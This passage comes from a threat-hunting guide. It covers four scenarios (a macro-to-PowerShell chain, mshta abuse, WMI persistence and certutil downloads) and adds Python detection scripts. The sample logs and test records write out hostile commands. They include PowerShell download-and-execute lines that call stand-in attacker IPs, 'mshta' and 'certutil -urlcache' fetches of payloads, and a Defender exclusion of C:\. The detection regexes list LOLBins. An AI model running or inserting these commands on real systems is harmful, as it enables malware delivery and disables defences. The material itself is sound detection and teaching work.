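OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common ones are listed.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
SUSPICIOUS_SWITCHES = {"-nop": "no profile", "-w hidden": "hidden window",
                       "-exec bypass": "execution policy bypass", "-noni": "non-interactive"}

# Assumed stage-2 command, used only to build a realistic encoded sample.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://89.45.78.120/stage2.ps1')"


def encode_ps(command):
    """Encode the way powershell.exe -enc expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 records from FIN-WS-04
    {"Host": "FIN-WS-04", "User": "finance_exec01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -exec bypass -enc " + encode_ps(STAGE2)},
    {"Host": "FIN-WS-04", "User": "finance_exec01",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\Loader\launch.dll,EntryPoint"},
    {"Host": "FIN-WS-04", "User": "finance_exec01",  # benign: user opens Word from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\finance_exec01\Desktop\salary_update_fy2025.docm"'},
    {"Host": "FIN-WS-04", "User": "finance_exec01",  # benign: Office print helper process
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def office_spawn_findings(events):
    """Office parent -> script-host child, with switches and decoded command attached."""
    findings = []
    for e in events:
        parent = ntpath.basename(e["ParentImage"]).lower()  # ntpath: Windows paths on any OS
        child = ntpath.basename(e["Image"]).lower()
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            cl = e["CommandLine"]
            findings.append({"host": e["Host"], "user": e["User"], "parent": parent,
                             "child": child,
                             "switches": [v for k, v in SUSPICIOUS_SWITCHES.items() if k in cl.lower()],
                             "decoded": decode_encoded_command(cl)})
    return findings


if __name__ == "__main__":
    for f in office_spawn_findings(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']}: {f['parent']} -> {f['child']} {f['switches']}")
        print("  decoded:", f["decoded"])
```

The parent/child check is the detection; the decoder is what turns an alert into a finding, because the decoded text tells the hunter what was fetched and from where. Legitimate Office child processes such as splwow64.exe are excluded by the script-host allowlist rather than by a blocklist, which keeps the rule from firing on printing or add-in helpers.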

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Malicious Macro Document Executed via Phishing Email
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Email phishing delivered macro-enabled document that resulted in
initial access via PowerShell
• Findings:
o Email with spoofed sender and .docm attachment reached multiple users
o User finance_exec01 opened the file on FIN-WS-04
o winword.exe spawned obfuscated PowerShell
o DLL file dropped and executed using rundll32.exe, then made outbound C2
connection
o DLL and PowerShell hash matched known malware on VirusTotal
o EDR flagged behaviour post-execution
• MITRE Techniques Observed:
o T1566.001 (Spearphishing Attachment)
o T1204.002 (User Execution: Malicious File) and T1059.005 (Visual Basic macro)
o T1059.001 (PowerShell)
o T1105 (Ingress Tool Transfer – DLL retrieved and executed)
o T1218.011 (System Binary Proxy Execution: Rundll32)
• Recommendations:
1. Isolate host FIN-WS-04 and begin forensic analysis
2. Remove launch.dll and scan for other payloads
3. Block external IPs and domains contacted by DLL
4. Reconfigure email gateway to block macro-enabled Office files
5. Strengthen SPF/DKIM/DMARC policies
6. Educate users on phishing risks, especially with attachments
7. Develop detection for Office spawning scripting tools (PowerShell)
• Next Steps:
o Check for persistence mechanisms (registry run keys, scheduled tasks)
o Run network sweep to identify similar DNS or IP communication
o Tune EDR to alert earlier on Office to PowerShell execution chains

SCENARIO 8: ABUSE OF LIVING-OFF-THE-LAND BINARIES (LOLBINS) FOR DEFENCE
EVASION AND EXECUTION

Background: A detection engineering team notices that mshta.exe, a legitimate Windows
binary, has been used in an unusual context on a user workstation. The binary executed a
remote HTA (HTML Application) file from an external IP address. A threat hunt is launched
to investigate the abuse of LOLBins in the environment, particularly for code execution and
evasion.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker is abusing trusted Windows binaries (LOLBins) such as mshta.exe
to execute malicious code and evade traditional security controls.

TTP Reference (MITRE ATT&CK):

• T1218.005: System Binary Proxy Execution – Mshta
• T1106: Execution – Native API
• T1059.005: Command and Scripting Interpreter – Visual Basic (VBScript inside the HTA)
• T1059.001: Command and Scripting Interpreter – PowerShell (stager launched by the HTA)
• T1055: Process Injection
• T1140: Deobfuscate/Decode Files or Information

Scope of Hunt:

• Timeframe: Last 10 days
• Target: All endpoints (focus on workstations)
• Data sources: Sysmon, EDR, Proxy logs, PowerShell logs
• Focus: LOLBins such as mshta.exe, rundll32.exe, regsvr32.exe, certutil.exe

Telemetry to Review:

• Process execution logs
• Parent-child process relationships
• Network connections by LOLBins
• File writes or script downloads from LOLBin processes

2. EXECUTE

Sysmon Event ID 1 – Process Creation (LOLBin Execution):

Date: 2025-07-16 09:47:51
Process: mshta.exe
Command Line: mshta.exe http://198.51.100.55/payload.hta
Parent Process: explorer.exe
User: marketing_exec01
Host: MKT-WS-06
SHA256: 324fad66... (mshta.exe, verified Microsoft-signed binary)

Network Connection (Sysmon Event ID 3, enriched with proxy fields; Sysmon itself records
only the endpoints and protocol, the HTTP status and User-Agent come from the proxy):

Process: mshta.exe
Destination IP: 198.51.100.55
Port: 80
Protocol: HTTP
Country: Germany
Outcome: 200 OK
User-Agent: mshta/1.0

EDR Alert:

• Behaviour: Signed binary used to execute remote script
• HTA script launched embedded PowerShell command
• Further spawned:
o powershell.exe -w hidden -enc JAB...
o connection to http://198.51.100.55/loader.ps1
• Final payload: Executed Add-MpPreference -ExclusionPath C:\ (excludes the entire
system drive from Defender scanning)

Script Analysis (HTA file):

• VBScript embedded in HTA decoded to PowerShell stager
• Downloader connects to C2 and fetches backdoor script
• Script writes to C:\Users\Public\Tools\rat.ps1

Proxy Log:

User: marketing_exec01
URL: http://198.51.100.55/payload.hta
URL: http://198.51.100.55/loader.ps1
Referrer: None
Total Bytes Out: 1,200
Total Bytes In: 1,450,000

3. ANALYSE

Investigation Findings:
1. LOLBins Misuse Confirmed:
mshta.exe, a trusted Microsoft-signed binary, was used to load a remote HTA file over
plain HTTP. Because the binary itself is legitimate and permitted, the execution slipped past
application allowlisting and signature-based AV.
2. Script Chain Identified:
The HTA's VBScript decoded to a PowerShell stager, which fetched and executed
loader.ps1, a downloader for a persistent remote access tool written to
C:\Users\Public\Tools\rat.ps1.
3. Command Execution Observed:
PowerShell added C:\ as a Defender exclusion path, effectively disabling on-access
scanning for the whole system drive.
4. Victim Profile:
User marketing_exec01 reported clicking a document link in an email that opened and
closed quickly. No warning was shown to the user.
5. Persistence Not Yet Confirmed:
No scheduled task or registry persistence has been observed yet; further investigation is
required.

This is a clear example of LOLBin abuse for initial execution and evasion. mshta.exe was
used as a signed proxy binary to launch malicious code, followed by PowerShell
downloaders that weakened AV defences.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Abuse of mshta.exe for Remote Code Execution
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversary may be using trusted Windows binaries (LOLBins) to execute
remote payloads and avoid detection
• Findings:
o mshta.exe launched via user click to open http://198.51.100.55/payload.hta
o HTA file contained VBScript that executed PowerShell with an encoded downloader
o Downloader script fetched a secondary payload and created a Defender exclusion
for C:\
o Proxy and Sysmon logs show MKT-WS-06 downloaded about 1.45 MB from the
malicious infrastructure with only 1.2 KB sent out, so no exfiltration is evident at
this stage
o Toolset and TTPs (signed proxy binary, then encoded PowerShell, then an AV
exclusion) match a widely documented LOLBin execution chain
• MITRE Techniques Observed:
o T1218.005 (System Binary Proxy Execution: Mshta)
o T1059.005 (Visual Basic – VBScript in the HTA)
o T1059.001 (PowerShell)
o T1105 (Ingress Tool Transfer)
o T1562.001 (Impair Defenses: Disable or Modify Tools – Defender exclusion)
• Recommendations:
1. Isolate host MKT-WS-06 immediately
2. Revoke user account credentials and investigate mail source
3. Block outbound access to 198.51.100.55 and similar dynamic infrastructure
4. Block mshta.exe on user systems with an AppLocker or WDAC rule (or EDR policy); it is
rarely needed outside legacy HTA applications
5. Review all other LOLBin executions organisation-wide (certutil.exe, regsvr32.exe,
etc.)
6. Enable script block logging and advanced PowerShell logging
7. Reimage affected endpoint after triage
• Next Steps:
o Investigate potential persistence mechanisms not yet triggered
o Perform YARA scan across all systems for rat.ps1 indicators
o Update SOC content to detect LOLBin-based execution chains

SCENARIO 9: SUSPICIOUS PERSISTENCE VIA WMI EVENT SUBSCRIPTION

Background: An internal red team simulation uncovered persistence maintained via WMI
(Windows Management Instrumentation) event subscriptions. Since this technique is
stealthy and fileless, the SOC launches a proactive threat hunt to check if any real-world
adversaries are using WMI for persistence inside the environment.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker may have established stealthy persistence on endpoints using
WMI permanent event subscriptions, which trigger malicious code execution on system
events such as user logon or a scheduled time.

TTP Reference (MITRE ATT&CK):

• T1546.003: Event Triggered Execution – WMI Event Subscription
• T1053.005: Scheduled Task (possible secondary execution)
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1216: System Script Proxy Execution

Scope of Hunt:

• Timeframe: Past 30 days
• Target: Workstations and servers (high-priority: domain-joined hosts)
• Data Sources: WMI repository dump, Sysmon logs, PowerShell logs, EDR telemetry
• Focus: Unusual __EventFilter, __EventConsumer and __FilterToConsumerBinding
entries

Telemetry to Review:

• WMI repository content from the ROOT\Subscription namespace
• Sysmon Event ID 1 and 13, plus Event ID 19, 20 and 21 (WMI filter, consumer and
binding activity) where the Sysmon configuration enables them
• Microsoft-Windows-WMI-Activity/Operational log, Event ID 5861, which records new
permanent subscriptions on Windows 10 / Server 2016 and later
• Any command line or process triggered by WMI consumers (wmiprvse.exe as parent)
• Registry (if a script path is referenced)

2. EXECUTE

WMI Repository Dump from Host (ENG-WS-17):

EventFilter:

Name: LogonTrigger
Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance
ISA 'Win32_ComputerSystem' AND TargetInstance.UserName != NULL
EventNamespace: root\cimv2 (the filter, consumer and binding objects themselves are
stored in root\subscription)

EventConsumer:

Name: EvilConsumer
Type: CommandLineEventConsumer
CommandLineTemplate: powershell.exe -nop -w hidden -enc JAB...
WorkingDirectory: C:\Users\Public

FilterToConsumerBinding:

Filter: LogonTrigger
Consumer: EvilConsumer

Sysmon Event ID 1 – Triggered Process:

Date: 2025-07-10 09:22:44
Process: powershell.exe
Parent: wmiprvse.exe
Command Line: powershell.exe -nop -w hidden -enc JAB...
SHA256: b2f84d9912...

Sysmon Event ID 13 – Registry Modification:

Process: powershell.exe
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svcstart
Value: rundll32.exe "C:\Users\Public\backdoor.dll",Entry

EDR Telemetry:

• Triggered process tree: wmiprvse.exe → powershell.exe → dropped backdoor DLL
• No parent process linked to user activity
• DLL contains reverse shell code on port 5555 (not blocked by host firewall)

3. ANALYSE

Findings:

1. WMI Persistence Artifact:
A WMI event subscription (LogonTrigger) polls Win32_ComputerSystem every 60 seconds
and fires when UserName changes, i.e. at interactive logon. Permanent subscriptions of
this kind are uncommon in legitimate enterprise software.
2. Payload Execution via PowerShell:
When triggered, wmiprvse.exe launches PowerShell with an encoded command that writes
a Run key so a backdoor DLL is also executed at every user logon.
3. No Scheduled Task or Conventional Dropper:
The subscription itself lives in the WMI repository (OBJECTS.DATA under
%SystemRoot%\System32\wbem\Repository), not in a file or scheduled task, so endpoint
scanners that only check Run keys, services and tasks miss it unless WMI objects are
audited. The secondary Run key and backdoor.dll are file-backed artefacts and are the
easier ones to find.
4. EDR Flagged DLL:
The dropped DLL is flagged on VirusTotal (42/71) and connects to an external IP on an
unusual port (5555), confirming backdoor functionality.

An adversary has established WMI-based stealth persistence that executes a payload at
logon without a scheduled task or service entry. This technique is indicative of advanced
post-exploitation behaviour.
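An added triage script for exported WMI subscriptions (example code, not from the original document or any vendor tool). It assumes each host's __EventFilter, __EventConsumer and __FilterToConsumerBinding objects from root\subscription were exported to JSON (for instance with Get-CimInstance -Namespace root/subscription piped to ConvertTo-Json) and scores each binding on the signals a hunter looks for: script-capable consumer classes, LOLBins and encoded PowerShell in the command, logon/timer style filter queries and user-writable working directories. The "SCM Event Log" filter/consumer pair is the default subscription present on Windows and is allowlisted; the DiskSpace entries are a made-up benign example.

```python
"""Triage WMI permanent event subscriptions exported from endpoints.
Example code added for this page (not from the original document). It assumes each
host exported the __EventFilter, __EventConsumer and __FilterToConsumerBinding
objects of root\\subscription to JSON; the export below is constructed and mirrors the
ENG-WS-17 dump plus two benign entries."""
import re

# Constructed per-host export. The 'SCM Event Log' pair is the default subscription
# shipped with Windows; DiskSpace* is a made-up but plausible IT-ops subscription.
SAMPLE_EXPORT = {
    "host": "ENG-WS-17",
    "filters": [
        {"Name": "SCM Event Log Filter", "EventNamespace": r"root\cimv2",
         "Query": "select * from MSFT_SCMEventLogEvent"},
        {"Name": "LogonTrigger", "EventNamespace": r"root\cimv2",
         "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
                  "TargetInstance ISA 'Win32_ComputerSystem' AND TargetInstance.UserName != NULL"},
        {"Name": "DiskSpaceFilter", "EventNamespace": r"root\cimv2",
         "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE "
                  "TargetInstance ISA 'Win32_LogicalDisk' AND TargetInstance.FreeSpace < 1073741824"},
    ],
    "consumers": [
        {"Name": "SCM Event Log Consumer", "Class": "NTEventLogEventConsumer"},
        {"Name": "EvilConsumer", "Class": "CommandLineEventConsumer",
         "CommandLineTemplate": "powershell.exe -nop -w hidden -enc JAB...",
         "WorkingDirectory": r"C:\Users\Public"},
        {"Name": "DiskSpaceConsumer", "Class": "NTEventLogEventConsumer"},
    ],
    "bindings": [  # references are stored as <class>.Name="<name>" in the repository
        {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
         "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
        {"Filter": '__EventFilter.Name="LogonTrigger"',
         "Consumer": 'CommandLineEventConsumer.Name="EvilConsumer"'},
        {"Filter": '__EventFilter.Name="DiskSpaceFilter"',
         "Consumer": 'NTEventLogEventConsumer.Name="DiskSpaceConsumer"'},
    ],
}

KNOWN_GOOD = {("SCM Event Log Filter", "SCM Event Log Consumer")}
SCRIPT_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Triggers attackers favour: logon, clock/timer, process start, performance counters.
TRIGGER_RE = re.compile(r"Win32_ComputerSystem|Win32_LogonSession|Win32_LocalTime|"
                        r"Win32_ProcessStartTrace|__TimerEvent|Win32_PerfFormattedData", re.I)
LOLBIN_RE = re.compile(r"powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|certutil|cmd\.exe", re.I)
OBFUSC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden|-nop\b|bypass|frombase64string", re.I)
STAGING_RE = re.compile(r"\\Users\\Public|\\Temp\\|\\ProgramData\\|\\AppData\\", re.I)


def _name(ref):
    """Pull the Name out of a binding reference such as __EventFilter.Name="LogonTrigger"."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def triage(export):
    """Score every filter/consumer binding in one host export, highest risk first."""
    filters = {f["Name"]: f for f in export["filters"]}
    consumers = {c["Name"]: c for c in export["consumers"]}
    results = []
    for b in export["bindings"]:
        fname, cname = _name(b["Filter"]), _name(b["Consumer"])
        if (fname, cname) in KNOWN_GOOD:
            continue
        flt, con = filters.get(fname, {}), consumers.get(cname, {})
        payload = " ".join(str(con.get(k, "")) for k in
                           ("CommandLineTemplate", "ExecutablePath", "ScriptText", "WorkingDirectory"))
        score, reasons = 0, []
        if con.get("Class") in SCRIPT_CONSUMERS:
            score += 2
            reasons.append(f"{con.get('Class')} runs arbitrary code")
        if LOLBIN_RE.search(payload):
            score += 2
            reasons.append("consumer launches a script host / LOLBin")
        if OBFUSC_RE.search(payload):
            score += 1
            reasons.append("encoded or hidden PowerShell switches")
        if TRIGGER_RE.search(flt.get("Query", "")):
            score += 1
            reasons.append("filter fires on logon/timer/process events")
        if STAGING_RE.search(payload):
            score += 1
            reasons.append("works from a user-writable staging directory")
        results.append({"host": export["host"], "filter": fname, "consumer": cname,
                        "score": score, "reasons": reasons,
                        "query": flt.get("Query", ""), "payload": payload.strip()})
    return sorted(results, key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage(SAMPLE_EXPORT):
        print(f"[{r['score']}] {r['host']} {r['filter']} -> {r['consumer']}: {'; '.join(r['reasons'])}")
```

Run the export on every host and feed each file through triage(); anything scoring 4 or more deserves a manual look at the full query and command template. The allowlist is deliberately exact-match on the filter/consumer pair, so a malicious consumer bound to the legitimate SCM filter would still be scored.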

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Stealth Persistence via WMI Event Subscription
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversaries may use WMI event subscriptions to establish hidden
persistence mechanisms
• Findings:
o Host ENG-WS-17 has WMI subscription in ROOT\Subscription triggering
PowerShell on user logon
o Triggered PowerShell command sets autorun key for DLL execution
o DLL opens reverse shell and is flagged malicious on VirusTotal
o Execution chain traced to wmiprvse.exe, no user interaction observed
o No legitimate software or policy explains this WMI activity
• MITRE Techniques Observed:
o T1546.003 (Event Triggered Execution: WMI Event Subscription)
o T1059.001 (PowerShell Execution)
o T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys)
o T1218.011 (System Binary Proxy Execution: Rundll32 – backdoor DLL loaded via
rundll32.exe)
o T1105 (Ingress Tool Transfer – backdoor DLL staged on the host)
• Recommendations:
1. Remove the WMI filter, consumer and binding (Get-CimInstance / Remove-CimInstance
against the root\subscription namespace, or wbemtest)
2. Isolate ENG-WS-17 for forensic triage
3. Hunt for similar subscriptions across the enterprise using WMI dump scripts
4. Block rundll32.exe execution from non-standard folders via endpoint controls
5. Detect wmiprvse.exe spawning PowerShell (or cmd.exe, mshta.exe, wscript.exe) in
SIEM/EDR
6. Audit the domain for other systems with abnormal WMI objects in ROOT\Subscription
• Next Steps:
o Create detection rules for WMI subscription abuse (Sysmon Event ID 19/20/21,
WMI-Activity Event ID 5861)
o Restrict write access to the root\subscription namespace (WMI namespace security)
to administrators
o Train SOC analysts on WMI persistence detection techniques

SCENARIO 10: SUSPICIOUS USE OF CERTUTIL FOR PAYLOAD DOWNLOAD AND
EXECUTION

Background: SOC receives a tip from a threat intel provider that attackers are increasingly
abusing certutil.exe, a legitimate Windows utility, to download malicious files and evade
detection. A recent EDR anomaly shows a rarely used host executing certutil.exe with
network activity. A threat hunt is initiated to check for abuse of certutil across the
enterprise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis:
An attacker is using certutil.exe to download or decode malicious files as part of initial
access or staging, taking advantage of its trusted, signed nature to bypass defences.

TTP Reference (MITRE ATT&CK):

• T1218: System Binary Proxy Execution – certutil.exe (MITRE tracks certutil as software
S0160; there is no certutil sub-technique, and T1218.010 is Regsvr32)
• T1105: Ingress Tool Transfer
• T1140: Deobfuscate/Decode Files or Information
• T1204.002: User Execution – Malicious File

Scope of Hunt:

• Timeframe: Last 14 days
• Target: All Windows endpoints
• Data sources: Sysmon (Process Creation), EDR, Web proxy logs, DNS logs
• Focus: Instances where certutil.exe was used with -urlcache, -verifyctl or -decode, or
called from user folders

Telemetry to Review:

• Process command lines for certutil.exe
• Network connections from certutil.exe
• File writes (dropped .exe, .dll, .bat files)
• DNS resolutions for suspicious domains

2. EXECUTE

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-15 22:14:33
Process: certutil.exe
Command Line: certutil.exe -urlcache -split -f http://malicious[.]site/payload.exe
C:\Users\Public\Downloads\tools.exe
Parent: cmd.exe
User: staff_admin02
Host: OPS-WS-23
Signature: verified Microsoft-signed binary (the image hash is unchanged; the abuse is in
the arguments, not the binary)

Sysmon Event ID 11 – File Create:

File Created: C:\Users\Public\Downloads\tools.exe
Process: certutil.exe
File Size: 865 KB
Hash: 6b4f89c0...

Sysmon Event ID 1 – Secondary Execution:

Date: 2025-07-15 22:15:01
Process: tools.exe
Parent Process: explorer.exe
User: staff_admin02
Network Connection: 144.76.12.88:443 (Germany)
Command Line: tools.exe --checkin --stealth

EDR Alert:

• Unusual use of certutil observed
• tools.exe triggered behaviour detection:
o Injected into explorer.exe
o Added itself to HKCU\Software\Microsoft\Windows\CurrentVersion\Run
o Contacted external IP over HTTPS with suspicious User-Agent

Proxy Logs:

URL: http://malicious.site/payload.exe
Category: Uncategorised / Newly Registered Domain
Bytes In: 865,000
Bytes Out: 2,500
Downloaded by: certutil.exe

Threat Intel Check:

• malicious[.]site flagged in multiple feeds
• IP address linked to previous phishing campaigns

3. ANALYSE

Findings:

1. Certutil Abused as Downloader:
certutil.exe was run with -urlcache -split -f to download an .exe from a known malicious
domain and save it to a public user folder.
2. Process Execution Chain:
The dropped executable was launched 28 seconds after the download with explorer.exe as
its parent, which is consistent with an interactive launch from the user's session rather
than a script.
3. Malicious Behaviour Detected:
tools.exe injected into explorer.exe, created persistence via a HKCU Run key and reached
out to 144.76.12.88 over HTTPS with a suspicious User-Agent.
4. No Legitimate Reason for Use:
User staff_admin02 had no task involving certificate management or certutil, and the
machine is a standard workstation.
5. Time of Execution:
Activity occurred after 10 PM, outside normal business hours.

This is a textbook example of living-off-the-land abuse using certutil.exe to stage malware.
The attacker downloaded and executed a binary without triggering AV at the time, likely
because the downloader was a signed Microsoft binary and the payload had not yet been
seen by the AV engine.
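The command-line patterns from scenario 8 (mshta.exe) and this scenario (certutil.exe), together with regsvr32/rundll32 proxy execution and the Add-MpPreference exclusion, as one added hunting example (not from the original document). Each rule returns the ATT&CK technique it maps to; benign look-alikes (certutil -hashfile, rundll32 opening a Control Panel applet, Get-MpPreference) are included to show what must not fire. All records are constructed; hostnames and users come from the scenarios, and the HR-WS-09 entries and the rundll32 parent on ENG-WS-17 are assumptions.

```python
"""Hunt Sysmon process-creation records for LOLBin abuse: mshta/regsvr32/rundll32 proxy
execution, certutil used as a downloader or decoder, and Defender exclusions added from
PowerShell. Example code added for this page, not from the original document; the
records are constructed from scenarios 8 and 10 plus benign look-alikes."""
import ntpath
import re

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\(?:Users\\Public|Users\\[^\\]+\\AppData|Windows\\Temp|ProgramData)\\", re.I)


def _image(e):
    return ntpath.basename(e["Image"]).lower()  # ntpath handles Windows paths on any OS


def rule_mshta(e):
    if _image(e) == "mshta.exe" and URL_RE.search(e["CommandLine"]):
        return "T1218.005", "mshta.exe executing a remote HTA"


def rule_certutil(e):
    if _image(e) != "certutil.exe":
        return None
    cl = e["CommandLine"].lower()
    if re.search(r"[-/](?:urlcache|verifyctl)\b", cl) and URL_RE.search(cl):
        return "T1105", "certutil.exe used as a downloader"
    if re.search(r"[-/]decode\b", cl):
        return "T1140", "certutil.exe decoding a base64 payload"
    # -hashfile, -verify, -dump and similar are routine admin use and are not flagged


def rule_regsvr32(e):
    cl = e["CommandLine"].lower()
    if _image(e) == "regsvr32.exe" and ("scrobj.dll" in cl or URL_RE.search(cl)):
        return "T1218.010", "regsvr32.exe loading a scriptlet or remote object"


def rule_rundll32(e):
    cl = e["CommandLine"]
    if _image(e) == "rundll32.exe" and (USER_WRITABLE_RE.search(cl)
                                        or "javascript:" in cl.lower() or URL_RE.search(cl)):
        return "T1218.011", "rundll32.exe loading from a user-writable path, URL or javascript:"


def rule_defender_tamper(e):
    cl = e["CommandLine"].lower()
    if _image(e) in {"powershell.exe", "pwsh.exe"} and re.search(
            r"add-mppreference\s+-exclusion|set-mppreference\s+-disable", cl):
        return "T1562.001", "Defender exclusion added or protection disabled"


RULES = [rule_mshta, rule_certutil, rule_regsvr32, rule_rundll32, rule_defender_tamper]


def hunt(events):
    """Apply every rule to every record; first matching rule wins per record."""
    findings = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                m = URL_RE.search(e["CommandLine"])
                findings.append({"host": e["Host"], "user": e["User"], "image": _image(e),
                                 "parent": ntpath.basename(e["ParentImage"]).lower(),
                                 "technique": hit[0], "reason": hit[1],
                                 "url": m.group(0) if m else None})
                break
    return findings


def _rec(host, user, parent, image, cmdline):
    return {"Host": host, "User": user, "ParentImage": parent, "Image": image, "CommandLine": cmdline}


SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 records
    _rec("MKT-WS-06", "marketing_exec01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
         "mshta.exe http://198.51.100.55/payload.hta"),
    _rec("OPS-WS-23", "staff_admin02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
         r"certutil.exe -urlcache -split -f http://malicious.site/payload.exe C:\Users\Public\Downloads\tools.exe"),
    _rec("MKT-WS-06", "marketing_exec01", r"C:\Windows\System32\mshta.exe",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         'powershell.exe -w hidden -c "Add-MpPreference -ExclusionPath C:\\"'),
    _rec("ENG-WS-17", "SYSTEM", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\Users\Public\backdoor.dll",Entry'),
    # benign look-alikes (assumed) that must not fire
    _rec("OPS-WS-23", "staff_admin02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
         r"certutil.exe -hashfile C:\Tools\setup.exe SHA256"),
    _rec("HR-WS-09", "hr_user03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
         "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl"),
    _rec("HR-WS-09", "hr_user03", r"C:\Windows\explorer.exe",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -c Get-MpPreference"),
]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']} {f['parent']} -> {f['image']} "
              f"{f['technique']}: {f['reason']} {f['url'] or ''}")
```

The rules key on arguments rather than image hashes because every binary here is the genuine signed Microsoft file; the certutil rule in particular leaves -hashfile and -verify alone so PKI administrators do not drown the queue, which is the allowlist the Next Steps below call for.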

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Malicious File Delivery via Certutil Abuse
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversaries are using certutil.exe to download and execute payloads
under the guise of legitimate tools
• Findings:
o certutil.exe executed by staff_admin02 on OPS-WS-23 with the -urlcache flag
o Downloaded tools.exe from http://malicious.site/, saved to the public Downloads
folder
o File was executed within seconds, connected to the C2 server and attempted
persistence
o tools.exe showed suspicious behaviour including process injection and registry
modification
o No business justification for use of certutil by this user on that endpoint
• MITRE Techniques Observed:
o T1218 (System Binary Proxy Execution – certutil.exe, S0160)
o T1105 (Ingress Tool Transfer)
o T1055 (Process Injection)
o T1547.001 (Registry Run Key Persistence)
• Recommendations:
1. Isolate OPS-WS-23 and submit tools.exe for malware analysis
2. Revoke and reset credentials for staff_admin02
3. Block access to malicious.site and IP 144.76.12.88 at proxy/firewall
4. Add rules to prevent certutil.exe from making outbound connections
5. Monitor for use of certutil with the -urlcache, -verifyctl, -decode or -encode flags, and
for any certutil command line containing a URL
6. Develop SIEM rules to detect LOLBin abuse via command line patterns
• Next Steps:
o Sweep enterprise for similar certutil executions
o Create allowlist of legitimate certutil.exe usage contexts (PKI administration hosts,
-hashfile and -verify usage)
o Train analysts and red teamers on detection and simulation of LOLBin use